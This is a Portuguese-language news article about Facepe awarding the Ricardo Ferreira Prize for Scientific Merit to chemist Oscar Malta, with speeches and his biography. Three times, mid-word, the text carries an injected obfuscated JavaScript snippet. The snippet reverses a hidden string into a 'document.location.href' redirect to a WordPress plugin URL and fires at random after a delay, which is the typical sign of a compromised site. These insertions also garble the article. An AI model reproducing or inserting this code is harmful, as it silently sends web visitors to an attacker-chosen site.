Facepe entrega Prêmio Ricardo Ferreira ao Mérito Científico

Crédito da foto: Aílton Pedroza (Secti)

Crédito da foto: Aílton Pedroza (Secti)

A Fundação de Amparo à Ciência e Tecnologia do Estado de Pernambuco – Facepe – entregou na manhã desta quarta-feira (21), o prêmio Ricardo Ferreira ao Mérito Científico para o pesquisador Oscar Malta em cerimônia realizada no Salão Nobre da Instituição. A solenidade contou com a presença da Secretária de Ciência, Tecnologia e Inovação do Estado de Pernambuco, Lúcia Melo, o presidente da Fundação, Abraham Sicsu, a Diretora de Inovação, Fátima Cabral, o representante regional do Ministério a Ciência e Tecnologia, José Bertotti, além de outras autoridades.

Lúcia Melo parabenizou a Facepe pela iniciativa, como também ao pesquisador Oscar Malta pelo prêmio, e defendeu que este é um incentivo imenso para pesquisadores e cientistas de todo Nordeste. “A Facepe tem nessa gestão o desafio de apoiar a ciência e tecnologia em sua plenitude, abrindo espaço para que a ciência possa servir a sociedade pernambucana. Ricardo Ferreira sempre apostou nisso. Muito mais que um cientista, Ricardo era um idealista, humanista responsável pela formação de uma geração inteira e geração esta que continua form$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando pessoas inspiradas nesse ensinamento. Não houve melhor escolha do que o Oscar Malta para o recebimento deste primeiro prêmio”, afirmou Lúcia Melo.

Oscar Malta agradeceu e acredita ser um gr$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande incentivo para todos os pesquisadores. A homenagem era, na verdade, a todo trabalho que teve início em meados dos anos 70  dos anos 70 no grupo de física da UFPE e ao departamento de química fundamental, sob a liderança de Ricardo Ferreira e Gilberto Sá. Ele recordou de uma frase do Ricardo Ferreira: “atividade científica é uma atividade social e não haverá progresso ou bem-estar social se não houver progresso científico”. Disse que enquanto estivesse vivo, continuaria a fazer ciência. 

O presidente da Facepe, Abraham Sicsu, abriu a solenidade com o salão lotado e agradeceu a todos os presentes. Na ocasião, o diploma foi entregue pelo ex-diretor científico da Facepe, Arnóbio da Gama e, para a entrega da medalha, foi convidada Roberta Ferreira, a filha do homenageado.

Prêmio Ricardo Ferreira ao Mérito Científico: Criado em 2014, constitui-se como reconhecimento público e estímulo a um cientista brasileiro ou estrangeiro com permanência mínima de 10 anos em Pernambuco que tenha se destacado pela realização de contribuição científica ou tecnológica de extraordinário valor para o progresso da sua área do conhecimento. Em 2015, concedido para a área de “Ciências Exatas, da Terra e Engenharias”. A homenagem enaltece o reconhecimento das contribuições dadas em vida ao Estado por Ricardo de Carvalho Ferreira, cientista do campo da químico-física que dedicou sua vida à ciência.

Oscar Manoel Loureiro Malta - O homenageado desta primeira edição do prêmio é professor titular da UFPE, um dos fundadores do Departamento de Química Fundamental e de sua Pós-Graduação, sendo chefe do departamento e coordenador do programa. É membro titular da Academia Brasileira de Ciências e foi, em duas ocasiões, membro do Comitê de Assessoramento do Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq). É revisor de vários periódicos e membro atual do corpo editorial de três periódicos internacionais. Proferiu 20 palestras convidadas em congressos internacionais, foi pesquisador/professor visitante no Centro Nacional de Pesquisa Científica (CNRS, França), na Universidade Estadual Paulista (UNESP), na Universidade de São Paulo (USP), na Universidade Sant$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ander (Colômbia), na Universidade de Wroclaw e na Universidade de Aveiros, em Portugal (Convidado do Programa Erasmus Mundus). Recebeu o Prêmio Bunshah na Conferência International em Revestimentos Metalúrgicos e Filmes Finos em 2004.